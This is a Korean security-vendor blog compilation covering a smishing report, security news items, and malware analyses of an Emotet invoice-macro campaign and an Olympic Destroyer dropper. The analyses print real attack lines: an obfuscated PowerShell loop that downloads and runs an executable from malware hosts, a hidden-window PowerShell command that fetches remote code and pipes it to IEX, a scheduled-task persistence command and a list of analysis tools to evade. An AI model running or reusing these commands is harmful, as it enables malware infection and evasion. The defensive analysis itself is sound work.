[11월 둘째주] 알약 스미싱 알림

 

본 포스트는 알약M 사용자 분들이 ‘신고하기’ 기능을 통해 알약으로 신고해 주신 스미싱 내역 중 ‘특이 문자’를 자체 수집, 집계하여 제공해 드리는 정보성 포스트입니다.

특이 문자 

 No.

문자 내용 

1

 너의 성적인 사진이 있으니 클릭하게끔 유도하는 문자

 2

 [Web발신] 11월11일/오후5시/라루체호텔/헤이스룸 [Web발신] ♣an eternal promise♣ 11.11(일).PM5시{포시즌호텔3층}

 3

 [Web발신] Cj대한통운 운송장번호[3209224154]  주문하신 상품이 발송 되었습니다

 4

 [Web발신][CJ대한통운]나기은11월07일택배주소를찾을수없음주소변경

Researcher discloses VirtualBox Zero-Day without reporting it to Oracle

보안 연구원인 Sergey Zelenyuk이 오라클의 VirtualBox 가상화 소프트웨어의 제로데이 취약점에 대한 세부사항을 공개했습니다. 이 취약점은 공격자가 게스트에서 호스트로 탈출하는데 악용될 수 있습니다.

Zelenyuk은 오라클의 패치를 기다리지 않고 이 취약점을 대중에 공개했습니다. 이유는 현대 정보 보안의 상태, 특히 보안 연구 및 버그바운티 쪽의 의견에 동의하지 않기 때문이라고 밝혔습니다.

이 취약점은 VirtualBox 5.2.20 및 이전 버전에 영향을 미치며, 모든 호스트 또는 게스트 OS에서 악용될 수 있습니다.

Zelenyuk은 디폴트 설정에서 동작하는 익스플로잇 코드를 개발했습니다. 유일한 요구사항은 네트워크 카드가 Intel PRO/1000 MT Desktop (82540EM)이어야 하며, NAT 모드여야 한다는 것입니다.

그는 Ubuntu 16.04 및 18.04 x86-64 guest에서 이 익스플로잇을 성공적으로 테스트 했습니다. 하지만 그는 이 코드가 윈도우에서도 작동할 것이라 추측했습니다.

이 취약점의 근본적인 원인은 메모리 충돌 버그입니다. 이는 루트 또는 관리자 권한을 가진 공격자가 guest에서 host ring3으로 탈출하는데 악용될 수 있습니다. 그런 다음, 공격자는 기존 테크닉을 사용해 /dev/vboxdrv를 통해 ring0으로 권한을 상승시킬 수 있습니다.

“이 익스플로잇은 리눅스 커널 모듈(LKM)으로 guest OS에 로드됩니다. 윈도우의 경우 초기화 래퍼와 커널 API 호출을 통한, LKM과 다른 드라이버가 필요할 뿐입니다.

“양쪽 OS 모두에서 드라이버를 로드하기 위해서는 상승 된 권한이 필요합니다. 이는 흔한 일이며, 극복이 불가능한 장애물로 간주 되지 않습니다. Pwn2Own 콘테스트에서, 연구원들은 익스플로잇 체인을 사용합니다. Guest OS에서 악성 웹사이트를 오픈한 브라우저를 악용하고, guestOS의 하이퍼바이저에서 공격하는데 필요한 ring0에 도달하기 위해 OS 취약점도 악용 되었습니다. 가장 강력한 하이퍼바이저 취약점들은 guest ring 3에서도 악용이 가능합니다. VirtualBox 또한 guest root 권한 없이도 도달이 가능한 코드였으며, 대부분 여기에 대한 감사가 이루어지지 않았습니다.”

이 연구원은 문제를 완화 시키기 위해 사용자들에게 가상 머신의 네트워크 카드를 AMD PCnet 또는 반가상화 된 네트워크 어댑터로 변경하거나, NAT의 사용을 피하라고 조언했습니다.

출처 :

https://securityaffairs.co/wordpress/77771/hacking/virtualbox-zero-day.html

안녕하세요이스트시큐리티 시큐리티대응센터(ESRC)입니다.

 

매크로를 이용한 송장 관련 악성 메일이 국내에 유포되고 있어 주의를 당부 드립니다.

※ 관련글 보기

 

▶ Trojan.Agent.Emotet 악성코드 분석 보고서

▶ [업데이트][주의] 견적서를 위장한 악성메일 지속적으로 유포중! 사용자들의 주의 필요

▶ 특정 기업의 프로젝트 파일처럼 위장한 악성 메일 유포 주의

▶ 국내 실제 기업명을 사칭한 악성 메일 유포 주의

 

이번에 발견된 악성 메일은 ‘INVOICE
#00U9404
’ 라는 제목으로 메일 본문에는 ‘Please find attached copy of
your latest invoice’
라는 내용으로 첨부된 파일의 실행을 유도합니다.
 

[그림 1] 수신된 메일

 

이용자가 첨부 파일 ‘Invoice_no_U9404.doc’
클릭할 경우 아래와 같이 매크로 실행을 유도 합니다
.  

[그림 2] 매크로 실행을 유도하는
DOC 파일

 

만약 이용자가 송장에
대한
자세한 정보를 열람하기 위해 매크로를 실행할 경우,

난독화된
스크립트를 이용해 
cmd.exe 프로세스를 실행하고, cmd.exe 프로세스는
powershell.exe 프로세스를 이용해 스크립트를 실행합니다.
 

[그림 3] 난독화 된 스크립트
실행 트리

 

스크립트는 공격자가 접속
가능한
C&C 서버를 조회하면서 EMOTET 악성코드
파일을 다운로드 합니다
. 분석 시에는 ‘http://vovsigorta.com’
사이트에 접속 후 %TEMP% 하위 경로에 ‘mjY.exe’라는
이름으로 파일 다운로드 및 실행을 하였습니다
.

 powershell  $IMF=’ppH’;$lFd=’http://vovsigorta.com/[email protected]://www.greenboxmedia.center/[email protected]://ghisep.org/img/jKX2btFw

@http://hgfitness.info/[email protected]://juegosaleo.com/TX9YrE9bp’.Split(‘@’);$fpj=([System.IO.Path]::GetTempPath()+’mjY.exe’);$jZC
=New-Object -com ‘msxml2.xmlhttp’;$pFS = New-Object -com
‘adodb.stream’;foreach($aXM in
$lFd){try{$jZC.open(‘GET’,$aXM,0);$jZC.send();$pFS.open();$pFS.type =
1;$pFS.write($jZC.responseBody);$pFS.savetofile($fpj);Start-Process
$fpj;break}catch{}} 

[ 1] 실행되는 스크립트

 

다운로드 된 악성코드는
사용자로부터 의심을 피하기 위해
‘C:WindowsSystem32tlntasp.exe’ 경로에
자가 복제를 한 후 사용자
PC 시스템 정보(프로세스 목록, OS버전, 아키텍처)
수집하고
C&C(millcreek.cc:7080) 서버로 전송합니다.

 

따라서 출처가 불분명한 메일에 있는 첨부파일 혹은 링크에 대해 접근을
삼가하시고
, 검증되지 않은 파일을 실행하기 전에는 백신 프로그램을 이용하여 악성 여부 검사를 수행해주시기
바랍니다
.

 

현재 알약에서는 관련 샘플을 Trojan.Agent.Emotet
으로 진단하고 있습니다.

Gmail Glitch Enables Anonymous Messages in Phishing Attacks

Gmail의 UX에 존재하는 오류로 인해 “발신인” 부분이 위조 되어 발신인 칸에 아무런 이름이 표시 되지 않는 이메일을 작성할 수 있었습니다.

이 트릭은 공식적인 경고문이나 시스템 메시지로 위장한 피싱 공격 시 무기화 되어 사용될 수 있었습니다.

소프트웨어 개발자인 Tim Cotten은 지난 금요일 Gmail의 UX에 존재하는 결점으로 인해 “발신인” 필드가 위장 되어 발신인이 없는 “유령” 이메일이 발송될 수 있다고 밝혔습니다.

<이미지 출처 : https://threatpost.com/gmail-glitch-enables-anonymous-messages-in-phishing-attacks/139247/>

Cotten은 이 트릭을 위해서 수신인의 이메일을 “발신인” 헤더(“name, recipient_email_here”)에 입력하고 <object>, <script>, <img>등과 같은 임의 태그와 연결했습니다.

그는 “잘못 된 형식의 이미지를 앞 필드에 삽입하면, 이메일의 송신자가 빈칸 형태로 표시될 것입니다.”고 밝혔습니다.

이 이메일을 수신하면, 송신인은 빈칸으로 표시 되며 “답장” 버튼을 눌러도 송신인의 이름이 표시 되지 않았습니다.

이메일 메시지의 “원본 표시” 파라미터 (이메일의 드롭 다운 태그를 통해 접근 가능) 아래에도 보낸 이의 이름을 볼 수 없었습니다.

실제 텍스트 아래에, <img> 태그를 사용한 뜻을 알 수 없는 테스트 케이스만 보일 뿐이었습니다.

“이는 따옴표를 붙인 별칭, 선생 된 단어, 공백 및 긴 base 64, 잘못 인코딩 된 img 태그의 조합이었습니다.”

“헤더 자체는 구글에서 보존 및 파싱했지만, UX는 이를 처리할 수 없었습니다.”

이 Gmail 오류는 무해한 것으로 보이지만, 공식 경고 메시지나 시스템 메시지로 위장한 피싱 메일을 작성하는 공격자들은 이를 유용하게 사용할 수 있습니다.

<스푸핑 된 ghost 이메일>>

<이미지 출처 : https://threatpost.com/gmail-glitch-enables-anonymous-messages-in-phishing-attacks/139247/>

“발신자 정보가 표시 되지 않을 경우, 이메일은 완전히 합법적으로 보이기 쉽습니다. 잘 교육 된 사용자들도 이에 속아 넘어가 계정이 해킹될 수 있습니다.”

Cotten은 이 Gmail의 취약점을 구글에 제보했으나, 구글은 아직까지 아무런 답변이 없었으며 버그를 수정하지도 않은 상태입니다.

출처 :

https://threatpost.com/gmail-glitch-enables-anonymous-messages-in-phishing-attacks/139247/

Hacking the hackers – IOT botnet author adds his own backdoor on top of a ZTE router backdoor

해킹 초보들이 ZTE 라우터를 해킹하는데 제조사의 백도어 계정을 사용하는 IoT 익스플로잇 스크립트를 사용하고 있는 것으로 나타났습니다. 하지만, 이 백도어는 해당 스크립트의 유일한 백도어가 아니었습니다. 이 코드를 배포하는 Scarface는 이 스크립트를 사용할 해킹 초보들을 해킹하는데 사용할 또 다른 커스텀 백도어를 추가했습니다.

IoT 봇넷계에서 유명한 Paras, Nexus, Wicked는 현재 활성화 되지 않은 상태이며, Scarface/Faraday라는 이름들이 해킹 초보들에게 IoT 봇넷 코드를 무기화 된 익스플로잇과 함께 판매하고 있습니다.

Scarface는 꽤 신용도가 높은 것으로 보입니다. 하지만 그는 ZTE ZXV10 H108L 라우터의 알려진 취약점을 무기화해 실행과 동시에 해킹 초보들의 시스템을 해킹하는 백도어와 함께 공개했습니다.

이 취약점은 로그인 시 ZTE 라우터의 백도어 계정을 이용하며 manager_dev_ping_t.gch 명령어를 주입합니다. Scarface의 코드는 다른 포트인 8083의 장치들을 노립니다. 하지만 차이점은 이것만이 아닙니다.

<이미지 출처 : https://securityaffairs.co/wordpress/77951/malware/iot-botnet-backdoored.html>

유출 된 코드에는 백도어 사용을 위한 login_payload 및 명령어 주입을 위한 command_payload가 있었습니다. 하지만, 또 다른 변수인 auth_payload도 발견되었습니다. 이는 base64로 암호화 된 Scarface의 백도어를 포함하고 있었습니다.

이 백도어 코드는 실제 취약점을 사용하는 작업 3단계(제조사의 백도어 사용, 명령어 주입 및 로그아웃)과는 별개로 exec을 통해 은밀히 실행 됩니다. 아래의 이미지에서 이를 확인하실 수 있습니다.

<이미지 출처 : https://securityaffairs.co/wordpress/77951/malware/iot-botnet-backdoored.html>

디코딩 이후 백도어 코드는 또 다른 웹사이트로 연결합니다. 이 웹사이트에는 Paste(.)ee URL로 연결하고 아래의 추가 코드를 실행하는 코드가 포함 되어 있습니다.

<이미지 출처 : https://securityaffairs.co/wordpress/77951/malware/iot-botnet-backdoored.html>

또한 백도어 사용자 크리덴셜 세트가 추가 되었으며, 그 후 로그 및 히스토리를 삭제해 흔적을 제거하는 작업을 발견했습니다. 또 다른 URL은 wget을 통해 유머 비디오를 호스팅하는 곳으로 연결 됩니다. 이는 Scarface가 사용자의 기기를 해킹했다는 표시일 것으로 추측 됩니다.

IoT 봇넷 운영자에게 백도어를 설치하는 목적은 여러가지일 수 있습니다. 예를 들어, Scarface가 해킹 초보의 시스템을 제어함으로써 그들이 구축한 더 작은 봇넷도 함께 제어할 수 있게 되거나, 개인적인 원한을 갖고 경쟁 IoT 봇넷 운영자의 시스템에 접근할 수도 있습니다.

출처 : 

https://securityaffairs.co/wordpress/77951/malware/iot-botnet-backdoored.html

안녕하세요. 이스트시큐리티입니다.

찬바람이 쌩~ 불어와 돌아보니, 벌써 2018년이 막바지를 향해 달리고 있습니다. 연말이 코앞으로 다가온 지금! ‘모바일 그린라이프’ 알약M에서 한 해 동안 가장 많은 사랑을 받은 기능은 무엇이었는지 함께 살펴보려고 합니다. 🙂 

알약M은 ‘알약’ 하면 떠오르는 백신 기능과 더불어 스마트폰에 꼭 필요한 여러 가지 관리 기능도 제공하고 있는데요. 알약M에서 무려 11가지나 되는 기능을 편리하게 사용할 수 있다는 사실을 모두 알고 계셨나요?

바이러스 검사, 파일 청소, 메모리 최적화, 배터리 최적화, 앱 관리, Wi-Fi 관리, 메신저 파일 정리, 스팸 차단, 스미싱 탐지, 앱 잠금, 설정 최적모드 등등…! 이렇게나 많은 기능 중 알약M 사용자 여러분들이 가장 많이 애정해주신 기능은 무엇일지, 지금 바로 발표하겠습니다! 

알약M하면 보안, 보안하면 알약M! ‘바이러스 검사’

올 한해 가장 많은 사랑을 받은 기능은 바로, 스마트폰의 안전을 책임지는 알약M ‘바이러스 검사’ 기능입니다. 

최신 DB와 클라우드 검사, 실시간 감시까지 가능해요!

요즘은 스마트폰으로 쇼핑도 하고, 뱅킹도 하고, 메시지도 주고받는 것이 일상이 되었는데요. 이에 따라 우리의 스마트폰이 노출되는 위협과 위협의 기회도 더 많아지게 되었습니다. 이럴 때 필요한 것이 바로 알약M의 바이러스 검사 기능인데요, 알약M의 검사 기능은 클라우드 검사를 통해 더욱더 빠르고 강력하게 바이러스를 탐지합니다. 안전한 스마트폰 생활을 위해 잊지 않고 검사 기능을 애용해주신 많은 사용자분들 덕분에, 올 한 해 가장 많이 사용된 알약M 기능 1위는 ‘바이러스 검사’가 차지하게 되었네요!

소중한 내 휴대폰을 더 안전하게 지키기 위해, 하루 한 번 검사하는 습관을 가져보면 어떨까요? 알약M의 검사 기능은 실행 중에 다른 앱을 사용해도 종료되지 않고, 상단바를 통해 쭈욱 검사가 진행되니 잊지 말고 매일 사용해주세요!

내 폰 속의 불필요한 파일을 깔끔하게! ‘파일 청소’

바이러스 검사 다음으로 많이 사용해주신 기능은 무엇일까요? 수많은 기능 중 당당히 2위를 차지한 기능은 바로, 스마트폰의 불필요한 파일을 깔끔하게 정리해주는 ‘파일 청소’ 기능입니다!

정크파일을 깔끔하게 정리해주는 파일 청소 기능!

새로운 기종의 스마트폰이 끊임없이 출시되며, 휴대폰 저장공간도 많이 늘어났지만 그만큼 사용하는 앱도 다양해지고, 사진과 동영상은 화질도 더 좋아지며 만성 용량 부족에 시달리는 분들이 많으실 텐데요 ㅠㅠ

이런 분들에게 가장 유용한 기능인 ‘파일 청소’가 올 한해에도 역시 많은 사랑을 받았습니다. 파일 청소 기능은 앱을 삭제해도 우리 모르게 남아있는 잔여 파일들과, 앱을 사용할수록 쌓이는 캐시 파일 등 불필요하게 저장공간을 차지하는 부분을 말끔하게 정리해준답니다.

여기서 잠깐!

부족한 휴대폰 용량을 늘리는 방법에 골머리를 앓는 분들이 계신다면, 파일 청소 기능과 함께 ‘메신저 파일 정리’ 기능을 사용해보시면 어떨까요? 알약M의 메신저 파일 정리 기능은 카카오톡, 라인 등의 메신저 대화방에 쌓인 썸네일 등 불필요한 파일들이 차지하는 용량까지 확보해주어 많은 분들을 놀라게 해온 기능입니다. (처음으로 메신저 파일 정리 기능을 사용하시는 분들은, GB 단위의 용량까지도 확보 가능하다는 사실!)

올 한 해 가장 많은 사랑을 받은 알약M의 기능들을 살펴보다 보니, 정말 많은 분들이 알약M을 매일 매일 꾸준히 사랑해주심을 새삼 느끼게 됩니다! 남은 2018년에도 더 안전하고 편리한 스마트폰 사용을 돕고, 내년에도 사용자 여러분의 모바일 그린 라이프를 위해 노력하는 알약M이 되겠습니다 =) 감사합니다!

New Strain of Olympic Destroyer Droppers

지난 몇 주 동안, 우리는 악명 높은 올림픽 디스트로이어(Olympic Destroyer) 공격의 배후에 있는 APT 그룹인 Hades의 새로운 활동을 발견했습니다. 게다가 새로운 공격은 이전 공격들과 많은 부분을 공유하지만, 해당 그룹이 진화했다는 것을 알 수 있는 중요한 변화를 목격할 수 있었습니다.

우리는 발견한 샘플을 통해 이 그룹이 다양한 분야를 연구했으며 연구원들이 공격을 탐지하기 어렵도록 만들기 위해 노력하고 있다는 것을 알 수 있었습니다.

2018년 한국에서 개최된 동계 올림픽을 노린 사이버 공격은 짧은 시간 동안 이 행사의 IT 인프라를 방해했습니다. 하지만 이는 많은 언론의 헤드라인을 장식했으며, 보안 커뮤니티는 무슨 일이 일어났으며 이 공격의 배후에 누가 있는지 캐내기 위해 노력했습니다.

연구를 통해, 보안 커뮤니티는 측면 이동 기능을 갖춘 와이퍼(wiper) 악성코드를 발견했으며, 후에 이를 올림픽 디스트로이어라 명명했습니다.

또한 이 공격의 배후에 있는 그룹은 “속임수의 달인”인 것으로 보입니다. 악성 코드에 많은 거짓 플래그를 포함해 속성을 잘못 판단하도록 만들었습니다. 

몇 달 후, 카스퍼스키는 이 공격의 초기 공격 벡터를 식별해낼 수 있었습니다. 첫 단계에서 다가오는 올림픽 행사와 관련 된 회사의 네트워크에 침투하기 위해 악성 문서를 첨부한 스피어피싱 이메일을 사용했습니다.

이 악성 문서를 공격에 연결 시킴으로써, 유사한 문서를 쫓아 해커 그룹의 활동을 추적할 수 있었습니다. 이 그룹은 한국을 넘어 전 세계의 조직들 다수에도 관심을 보였습니다.

Hades는 정찰 및 착취에 공개적으로 사용이 가능한 툴을 활용하는 것으로 알려져 있습니다.

Hades의 매크로가 시간이 지남에 따라 어떻게 진화했는지 보여주기 위해, 우리는 매크로 호출 그래프 생성기인 Vba2Graph를 사용했습니다.

아래 그림에서 어떤 기능이 추가 되었는지, 매크로의 복잡성이 시간이 지남에 따라 어떻게 증가했는지 등을 확인할 수 있습니다.

<이미지 출처 : https://research.checkpoint.com/new-strain-of-olympic-destroyer-droppers/>

구 버전들의 감염 흐름

최근 발견 된 드롭퍼를 제외하고, 위의 모든 샘플들은 실행 첫 번째 단계에서 유사한 기능을 보여주었습니다:

<이미지 출처 : https://research.checkpoint.com/new-strain-of-olympic-destroyer-droppers/>

새로운 드롭퍼 변종

가장 최근 발견 된 샘플은 Hades의 매크로가 늘 취하던 정상적인 경로에서 벗어나 완전히 새로운 변종을 보여주었습니다.

이 샘플은 2018년 10월 12일 우크라이나에서 VT에 처음 업로드 되었습니다. 이는 Hades의 이전 드롭퍼들과 유사한 인코딩 및 코딩 스타일을 보여주었습니다. 하지만 이는 안티 분석 기능, 지연 실행과 같은 새로운 기능들을 도입했습니다.

이 새로운 기능은 꽤 효과가 좋았던 것으로 보입니다. 인기있는 온라인 샌드박스들이 실행 된 프로세스나 네트워크 확동을 탐지하지 못했으며, 일부는 이 드롭퍼가 완전히 무해한 것으로 표시했습니다.

<이미지 출처 : https://research.checkpoint.com/new-strain-of-olympic-destroyer-droppers/>

1.  DOC 미끼

첫 단계에서, 사용자는 빈 페이지를 보게 됩니다.

매크로가 활성화 되면, 흰 텍스트를 검은색으로 변경해 내용이 표시 됩니다.

<이미지 출처 : https://research.checkpoint.com/new-strain-of-olympic-destroyer-droppers/>

2. WMI – 안티 분석

WMI를 사용해 매크로는 실행 되는 프로세스들을 반복합니다.

<이미지 출처 : https://research.checkpoint.com/new-strain-of-olympic-destroyer-droppers/>

리턴 된 프로세스 명은 인기있는 분석 툴들과 비교 되며, 이 매크로는 실행 중인 프로세스가 최소 40개 이상인지 확인합니다. 프로세스의 개수를 세면, 보통 적은 수의 프로세스를 실행하는 샌드박스 및 분석 환경을 알아내기에 효과적입니다.

분석 툴의 목록은 아래와 같습니다:

HaCKER,MalzILlA,pRocExP,WiREShARK,HxD,PowERsheLl_iSE,idA,Olly,fiDDLEr,mALwAre,VmtoOLsd,SWingBoX,vboXTrAY,secunia,hijack,VmtoOlsd’,Vbox,vMWaRE,VXsTReaM,AUtOIt,vmToOls,TcpVIeW,WiREShARK,prOCEss expLorer,VIsuAl bASiC,fiDDLEr

3. 디스크에 HTA 드롭

이 드롭퍼는 HTA 파일을 “%APPDATA%WPFT532.hta”에 드랍합니다.

<이미지 출처 : https://research.checkpoint.com/new-strain-of-olympic-destroyer-droppers/>

4-5 예약 된 작업

예약 된 작업은 아침 시간에 HTA가 실행 되도록 하기 위해 생성 되었습니다.

schtasks /Create /F /SC DAILY /ST “10:20” /TN “DriveCloudTaskCoreCheck” /TR “mshta C:\Users\[user]\AppData\Roaming\WPFT532.hta

파라미터들:

/F – 강제로 작업을 생성하고, 작업이 이미 존재할 경우 경고를 숨깁니다.

/SC – 일일 작업을 예약합니다.

/ST – 시작 시간

/TN – 작업 명

6. HTA 실행

HTA 파일은 VBScript를 활용해 다음 단계의 명령어 라인을 디코딩합니다. 이는 매크로 단계의 디코더와 동일한 기술입니다.

<이미지 출처 : https://research.checkpoint.com/new-strain-of-olympic-destroyer-droppers/>

7-9. Powershell 다운로드 및 실행

HTA 코드는 난독화 된 Powershell로 아래 명령어 라인을 실행합니다.

c:\WiNDOws\sYsTEM32\Cmd.eXE /c “Set AYW= -jOIn[CHAr[]] (40 ,39 , 40 , 78,39, 43,39 , 101, 119, 45, 79,39, 43 ,39 , 98,106 , 101 ,99 ,116 , 32 , 78,101 , 116 , 46 ,87, 39 , 43, 39 ,101 , 98 , 99 , 108, 105 ,101 ,110, 116 , 41,39 , 43 ,39,46,39,43 ,39 ,100 , 111,119 , 110 ,108 , 111 ,39,43 ,39, 97 , 100,115 ,116, 114,105 , 110 , 103,40 ,72 ,108, 39,43,39, 106,104,116 , 39 , 43 , 39 , 116 ,112, 58 , 39, 43,39 , 47, 47, 102 ,105, 110 , 100 , 117, 112 , 100, 97 ,39 , 43,39 , 116 ,101,39 ,43,39 , 109, 115 ,46,99 ,111, 109 , 47,99 , 104,39, 43,39, 101, 39 , 43 , 39,99 ,107 ,47,105 ,110,39 ,43 , 39 , 100 , 101 ,120,72,108, 106, 41,39 ,43 ,39, 52, 106 , 39,43,39 , 122,73 , 69,88, 39, 41 ,46 ,82 ,101, 112, 76 , 97,67,101, 40 ,40 ,91 , 99, 104,65 ,114 ,93,55, 50,43 ,91, 99, 104,65 , 114, 93,49,48,56, 43,91 ,99, 104,65 ,114,93,49, 48 ,54 , 41, 44,91,83,116 , 114, 73 ,110,103, 93 ,91 ,99 ,104,65, 114 ,93,51, 57 , 41, 46 ,82,101,112,76, 97, 67 ,101, 40 , 40,91,99, 104, 65, 114, 93, 53 ,50, 43 ,91 , 99 ,104, 65, 114 , 93,49,48,54, 43, 91 ,99, 104, 65,114,93 , 49 , 50 ,50,41,44, 39, 124 , 39 ,41 , 124 , 32, 46 ,32 , 40 , 32 ,36, 69, 110 ,86 , 58,67 , 79, 109 , 83, 80, 101 , 99 ,91,52 , 44 ,50, 52 ,44 ,50,53, 93 , 45 , 106,79 ,73 ,110 ,39 , 39, 41)^| . ( $pshOme[21]+$PSHoMe[30]+’x’) &&Set gnPq=ECHO inVOKe-ExPRessiON (get-ItEM eNV:AYw).valUe ^| pOWERsHElL -noPRoFI -EXEcuTiONpOlI BYPASS -noNi -NoeXi -WindoWStYlE HIdDen -&& c:\WiNDOws\sYsTEM32\Cmd.eXE /c %gNpq%”

Powershell deobfuscation stage 1:

(‘(N’+’ew-O’+’bject Net.W’+’ebclient)’+’.’+’downlo’+’adstring(Hl’+’jht’+’tp:’+’//findupda’+’te’+’ms.com/ch’+’e’+’ck/in’+’dexHlj)’+’4j’+’zIEX’).RepLaCe(([chAr]72+[chAr]108+[chAr]106),[StrIng][chAr]39).RepLaCe(([chAr]52+[chAr]106+[chAr]122),’|’)

Powershell deobfuscation stage 2:

(New-Object Net.Webclient).downloadstring(‘<http://findupdatems>[.]com/check/index’)|IEX

다운로드 된 문자열은 실행할 추가적인 Powershell로 추측 됩니다. 현재 시점에서는 2단계 페이로드를 다운로드 할 수 없었습니다.

Hades의 doc 파일과 매크로 난독화기는 다른 드롭퍼들 사이에서 구별할 수 있는 고유한 특징을 가지고 있었습니다.

이 특징은 매크로의 새로운, 오래된 변종 양쪽에도 존재합니다.

그닥 독특한 편은 아니지만, 대부분의 드롭퍼는 아래 세 가지 문서 제작자 이름들 중 하나를 포함하고 있습니다.

James, john, AV

항상 “True”가 되는 “IF” 문:

<이미지 출처 : https://research.checkpoint.com/new-strain-of-olympic-destroyer-droppers/>

0을 리턴하기 위한 함수:

<이미지 출처 : https://research.checkpoint.com/new-strain-of-olympic-destroyer-droppers/>

문자열 및 2단계 코드는 매크로에 인코딩 되어 나타납니다:

<이미지 출처 : https://research.checkpoint.com/new-strain-of-olympic-destroyer-droppers/>

문자열의 난독화를 해제하기 위해, 디코딩 함수가 사용 되었습니다.

디코딩 기능이 하는 일은 각 인코딩 된 문자의 값을 상수 값만큼 줄이는 것입니다.

대부분의 드롭퍼는 사용자가 매크로를 활성화 한 후 문서의 외형을 변경하기 위해 2가지 방법을 사용했습니다.

1. 아래의 loop를 사용해 미끼 이미지 커버 제거

<이미지 출처 : https://research.checkpoint.com/new-strain-of-olympic-destroyer-droppers/>

2. 폰트 색상을 흰색에서 검은색으로 변경해 내용 공개

<이미지 출처 : https://research.checkpoint.com/new-strain-of-olympic-destroyer-droppers/>

Hades는 에뮬레이터의 정적 탐지/분석을 피하기 위해 트리거링 시 흔한 코드 드리거인 AutoOpen 등의 사용을 피하고 Word ActiveX 오브젝트와 함께 덜 알려진 트리거를 사용합니다.

이 트리거들에 대한 더 많은 정보는 여기에서 찾아볼 수 있습니다.

트리거들 중 일부는 많은 캠페인에서 사용 되었습니다:

– MultiPage1_Layout

– Frame1_Layout

– SystemMonitor1_GotFocus

– Image1_MouseMove

– ImageCombo21_Change

네트워크 인프라 노트

Hades 드롭퍼의 일반적인 관행은 해킹한 서버를 2단계 C2로 사용한다는 것입니다.

Hades의 인프라에 대해 많이 알려지지는 않았으나, C2에 연결한 드롭퍼들 중 일부는 서버 에러를 노출시켰습니다.

이러한 에러는 해킹 된 서버가 프록시의 역할만을 하며, 요청들은 실제로 Empire 백엔드에서 호스팅 된 또 다른 서버로 리디렉트 되었다는 것을 나타냅니다.

<이미지 출처 : https://research.checkpoint.com/new-strain-of-olympic-destroyer-droppers/>

이 “프록시” 기능은 Empire 내의 “홉 리스너(Hop Listener)”형식으로 포함 됩니다:

https://github.com/EmpireProject/Empire/blob/master/data/misc/hop.php

우연히도, 위의 에러 메시지에서 관찰 된 것과 같은 hop.php 내 라인 25의 file_get_contents 함수가 있었습니다.

Hades는 그들의 작전을 늦출 조짐을 보이지 않고 있습니다. 그들은 능력을 키우고 있으며, 희생자는 점점 늘어나고 있습니다.

공격자의 최근 활동을 통해, 이전에는 볼 수 없었던 새로운 그들의 드롭퍼 변종을 발견할 수 있었습니다. 이는 첫 번째 단계의 TTP와는 차이점을 보였습니다.

Hades가 새로운 드롭퍼를 도입할 때 마다, 아주 적은 안티 바이러스 제조사들만이 이를 악성으로 탐지해낼 수 있었습니다. 이는 대부분의 Hades 작전이 레이더망 아래에서 이루어진다는 가능성을 보여줍니다.

출처 :

https://research.checkpoint.com/new-strain-of-olympic-destroyer-droppers/

Instagram Accidentally Exposed Some Users’ Passwords In Plaintext

인스타그램이 일부 사용자의 패스워드가 일반 텍스트 형태로 노출될 수 있었던 보안 취약점을 패치했습니다.

인스타그램 측은 영향을 받은 사용자들에게 이 보안 버그에 대해 알리기 시작했습니다. 이 버그는 최근 추가 된 기능인 “사용자 데이터 다운로드”에 존재했습니다. 이는 사진, 댓글, 포스트 등 인스타그램에 공유 된 데이터의 복사본을 다운로드할 수 있도록 하는 기능입니다.

승인 되지 않은 사용자들이 사용자들의 개인 데이터를 얻는 것을 방지하기 위해, 이 기능은 데이터를 다운로드하기 전 패스워드를 한번 더 묻습니다.

하지만 “사용자 데이터 다운로드”기능을 사용한 일부 사용자들의 패스워드가 일반 텍스트 형태로 URL에 포함 되어 있으며 페이스북의 서버에도 저장 되어 있었던 것으로 나타났습니다. 이 버그는 인스타그램 내부 팀에서 발견하였습니다.

인스타그램은 모회사인 페이스북이 소유한 서버에 저장 된 데이터는 삭제 되었으며, 이 툴은 현재 문제 해결을 위해 업데이트 된 상태라고 밝혔습니다. 또한 이 문제가 “매우 적은 수의 사용자들에게만” 영향을 미쳤다고도 밝혔습니다.

인스타그램은 유럽의 데이터 보호법인 GDPR을 준수하고, 페이스북의 캠브리지 아날리티카 관련 사고로 인한 사용자들의 프라이버시 우려를 덜기 위해 지난 4월 이 “사용자 데이터 다운로드”기능을 공개했습니다.

영향을 받는 사용자들은 패스워드를 즉시 변경하고 브라우저 히스토리를 삭제할 것을 강력히 추천합니다.

아직까지 인스타그램으로부터 어떠한 안내도 받지 않았다면, 당신의 인스타그램 계정은 이 버그에 영향을 받지 않았을 가능성이 높습니다. 하지만 계정의 프라이버시 및 보안이 신경 쓰인다면, 비밀번호를 변경하는 것이 좋습니다.

또한 사용자들은 이중 인증(2FA)을 활성화 하고 강력하고 고유한 패스워드를 사용하여 계정을 보호할 것을 권장합니다.

출처 : 

Google Services down due to BGP leak, traffic hijacked through Russia, China, and Nigeria

지난 월요일 BGP 유출로 인해 구글 서비스가 이용이 불가능한 상태가 되었습니다. 해당 트래픽은 러시아, 중국 및 나이지리아를 통해 리디렉트 되었습니다.

이 사고의 원인이 단순한 오류 때문인지, 아니면 BGP 프로토콜에 대한 사이버 공격 때문인지는 아직까지 확인 되지 않았습니다.

BGP 하이재킹이라고도 알려진 경로 하이재킹은 IP 주소 그룹의 라우팅 테이블이 의도적으로, 또는 실수로 손상 된 경우 발생합니다.

최근 보안 연구원인 Chris C. Demchak와 Yuval Shavitt는 지난 몇 년 동안 차이나 텔레콤이 인터넷 트래픽이 중국을 지나도록 부적절하게 리디렉트하고 있는 것을 발견했습니다.

차이나 텔레콤은 현재 북미 네트워크에 인터넷 접속 포인트(PoPs) 10곳(미국에 8곳, 캐나다에 2곳)을 소유하고 있으며, 주요 교환 지점에 걸쳐 있는 상태입니다.

두 연구원은 이 통신사가 트래픽이 중국을 지나가도록 하이잭하는데 PoPs를 악용했으며, 이는 지난 몇 년 동안 여러 차례 일어났다고 지적했습니다.

“BGP 포워딩 테이블 내에서, 각 AS(자율 시스템)의 관리자들은 목적지로 사용 되거나, 편리한 통과 지점으로 사용할지에 관계 없이 자신의 AS가 가지고 있는 IP 주소 블록을 이웃 AS에 알립니다.”

